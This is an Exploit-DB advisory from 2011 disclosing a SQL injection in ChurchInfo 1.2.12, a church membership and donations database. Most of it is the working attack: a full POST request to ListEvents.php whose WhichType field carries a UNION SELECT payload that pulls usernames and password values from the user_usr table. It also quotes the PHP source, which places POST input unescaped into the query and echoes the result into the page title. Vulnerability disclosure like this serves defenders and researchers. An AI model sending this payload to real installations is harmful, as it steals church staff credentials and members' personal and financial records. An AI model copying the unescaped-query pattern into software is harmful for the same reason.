ChurchInfo 1.2.12 - SQL Injection

EDB-ID:

15887

CVE:



Author:

dun

Type:

webapps


Platform:

PHP

Date:

2011-01-01


  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM
 
   [ Discovered by dun \ posdub[at]gmail.com ]
   [ 2011-01-01                              ]
 ##############################################################
 #  [ ChurchInfo <= 1.2.12 ]  SQL Injection Vulnerability     #
 ##############################################################
 #
 # Script: "ChurchInfo is a free church database program to help churches track members, 
 #	    families, groups, pledges and payments..."
 #
 # Script site: http://www.churchdb.org/
 # Download: http://sourceforge.net/projects/churchinfo/
 #
 # [SQL] Vuln: http://site.com/churchinfo-1.2.12/ListEvents.php
 # 
 #  POST /churchinfo-1.2.12/ListEvents.php HTTP/1.1
 #  Host: site.com
 #  User-Agent: Mozilla/5.0
 #  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 #  Accept-Language: pl,en-us;q=0.7,en;q=0.3
 #  Accept-Encoding: gzip,deflate
 #  Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
 #  Keep-Alive: 115
 #  Connection: keep-alive
 #  Cookie: d4dad6935f632ac35975e3001dc7bbe8=49c5739b193271a0005a59b294a05da9; PHPSESSID=8aec7c6adbe96b4079c0150b3c54452a
 #  Content-Type: application/x-www-form-urlencoded
 #  Content-Length: 150
 #   
 #  WhichType=-1/**/UNION/**/SELECT/**/1,concat_ws(char(58),usr_per_ID,usr_UserName,usr_Password),3,4,5,6,7,8/**/from/**/user_usr/**/WHERE/**/usr_per_ID=1
 #   
 #  HTTP/1.1 200 OK
 #  Date: Sat, 01 Jan 2011 15:39:10 GMT
 #  Server: Apache
 #  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
 #  Expires: Thu, 19 Nov 1981 08:52:00 GMT
 #  Pragma: no-cache
 #  X-Powered-By: PHP/4.4.9
 #  Keep-Alive: timeout=2, max=200
 #  Connection: Keep-Alive
 #  Transfer-Encoding: chunked
 #  Content-Type: text/html
 #    
 #    
 # Bug: ./churchinfo-1.2.12/ListEvents.php (lines: 29-48)
 #
 # ...
 # require 'Include/Config.php';
 # require 'Include/Functions.php';                             // (0) You should be logged in as some user
 # $eType="All";
 # $ThisYear=date("Y");
 # 
 # if ($_POST['WhichType']){
 #   $eType = $_POST['WhichType'];                              // (1)
 # } else {
 #   $eType ="All";
 # }
 # 
 # if($eType!="All"){
 #   $sSQL = "SELECT * FROM event_types WHERE type_id=$eType";  // (2)
 #   $rsOpps = RunQuery($sSQL);
 #   $aRow = mysql_fetch_array($rsOpps, MYSQL_BOTH);
 #   extract($aRow);
 #   $sPageTitle = "Listing Events of Type = ".$type_name;      // (3)
 # } else {
 #   $sPageTitle = gettext("Listing All Church Events");
 # }
 # ...  
 #
 #
 # Bug: ./churchinfo-1.2.12/Include/Header-function.php (line: 37)
 # 
 # ...  
 #    <title>ChurchInfo: <?php echo $sPageTitle; ?></title>     // (4) 
 # ...  
 # 
 ###############################################

 
 [ dun / 2011 ]